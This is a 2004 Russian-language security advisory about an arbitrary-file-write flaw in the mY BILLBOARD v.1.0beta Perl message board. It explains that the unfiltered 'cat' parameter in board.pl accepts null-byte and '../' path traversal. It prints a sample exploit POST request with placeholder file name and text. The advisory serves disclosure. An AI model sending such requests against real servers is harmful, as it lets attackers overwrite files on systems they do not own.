Security Lab

Изменение произвольных файлов на сервере в mY BILLBOARD v.1.0beta

Дата публикации:12.07.2004
Всего просмотров:1480
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: mY BILLBOARD v.1.0beta

Описание: Уязвимость в доске объявлений mY BILLBOARD v.1.0beta позволяет изменять содержание произвольных файлов на сервере.

В сценарии board.pl не фильтруется значение параметра "cat", который отвечает за название файла сообщений. Поэтому можно изменить название и расположение файла в который записывается сообщение. Открытие происходит функцией open(BOARD,"+<data/$cat.txt"), поэтому при добавленни null байта - "%00" мы заставим сценарий проигнорировать ".txt", а при добавлении "../" мы поднимемся на директорию выше.

Пример/Эксплоит:

Connect targethost:80

POST /cgi-bin/board/board.pl HTTP/1.0
Content-Length: 61

action=add&cat=[FILENAME]%00&names=test&city=test&text=[TEXT]

URL производителя: http://perl.webservis.ru

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Уязвимость обнаружил Иван Жданов [dokk21@rambler.ru]